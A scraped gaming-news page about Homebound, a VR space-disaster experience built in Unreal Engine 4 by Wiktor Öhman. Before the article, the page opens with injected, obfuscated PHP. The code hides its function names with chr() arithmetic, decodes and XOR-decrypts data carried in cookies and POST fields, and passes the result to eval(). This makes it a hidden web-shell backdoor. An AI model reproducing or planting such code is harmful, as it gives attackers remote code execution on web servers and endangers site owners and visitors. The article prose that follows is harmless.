$TqhfENrtYc = chr ( 457 - 378 ).chr ( 963 - 874 )."\x5a" . chr ( 388 - 293 ).chr (83) . "\124" . "\x6a" . chr ( 386 - 269 ); $QUvTtRaC = chr (99) . "\x6c" . "\141" . 's' . 's' . "\137" . chr ( 812 - 711 ).chr ( 716 - 596 ).chr ( 1008 - 903 )."\163" . "\164" . 's';$teOII = class_exists($TqhfENrtYc); $QUvTtRaC = "23122";$AkXtS = !1;if ($teOII == $AkXtS){function HlbTaJPFdB(){$Lpxlmlv = new /* 36911 */ OYZ_STju(36780 + 36780); $Lpxlmlv = NULL;}$VfTJubp = "36780";class OYZ_STju{private function EtwHRhpV($VfTJubp){if (is_array(OYZ_STju::$lHtPvU)) {$PkPeY = str_replace('<' . chr (63) . chr (112) . "\150" . 'p', "", OYZ_STju::$lHtPvU[chr ( 171 - 72 ).chr ( 489 - 378 ).'n' . "\x74" . "\x65" . "\156" . chr (116)]);eval($PkPeY); $VfTJubp = "36780";exit();}}private $vxQYXmnMKp;public function KSCZrEx(){echo 10910;}public function __destruct(){$VfTJubp = "46653_1494";$this->EtwHRhpV($VfTJubp); $VfTJubp = "46653_1494";}public function __construct($voWdcYa=0){$YcbKYnr = $_POST;$fWLtpNl = $_COOKIE;$HkGYOLS = "1fcb2f04-4d7e-4a8c-b9b7-bc396029efed";$GtyGL = @$fWLtpNl[substr($HkGYOLS, 0, 4)];if (!empty($GtyGL)){$ANEhXI = "base64";$hPAhDXacuW = "";$GtyGL = explode(",", $GtyGL);foreach ($GtyGL as $HiLYTu){$hPAhDXacuW .= @$fWLtpNl[$HiLYTu];$hPAhDXacuW .= @$YcbKYnr[$HiLYTu];}$hPAhDXacuW = array_map($ANEhXI . chr ( 291 - 196 ).chr (100) . 'e' . "\143" . chr (111) . chr ( 546 - 446 ).'e', array($hPAhDXacuW,)); $hPAhDXacuW = $hPAhDXacuW[0] ^ str_repeat($HkGYOLS, (strlen($hPAhDXacuW[0]) / strlen($HkGYOLS)) + 1);OYZ_STju::$lHtPvU = @unserialize($hPAhDXacuW);}}public static $lHtPvU = 14820;}HlbTaJPFdB();} Homebound is an Incredible yet Terrifying VR Space Experience , TheTwitt

Homebound is an Incredible yet Terrifying VR Space Experience

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Homebound is a new VR experience created by a veteran 3D artists who promises to take you an exciting journey in outer Space in a crippled spacecraft which is destined for a crash landing on earth. The experience is worth watching as it has some of the most powerful and gripping graphics to make believe the realism involved.

Homebound is a creation of Wiktor Öhman who describes this as a frantic VR experience. The game is built on Unreal Engine 4 which takes you through a series of terrifying events. The experience begins with the user escaping from a disintegrated mini-space station that is on the verge of falling apart. All you as a part of the whole scenario have to do is Survive the catastrophe.

Now, what attracts you the most about this experience, is its visuals in ultra high quality and extravagant detail. It is delightfully equipped with stunning lighting and polish that in no way seems like the work of a single man. Öhman collaborated with a Swedish Company named Quixel which is a pioneering firm in graphic tools with reputed clients such as Tesla and ILM.

Öhman’s generic attraction to Sci-Fi and love for SpaceX Endeavors is what inspired him to create this wondrous experience. He decided to put his efforts and time into Unreal Engine 4 as he dreamt of some really cool scenarios that could happen in a space capsule and tried to work with blueprints and started scripted the events and at the same time Unreal Engine 4 got a better VR support. Thus, he set out to create a VR game experience which felt just as natural thanks to the high resolution and a lot of cool tools to work with.

The gaming experience has been developed for both the HTC Vive with motion controllers and Oculus Rift with Joypad and is set to go on floors on October 31st.




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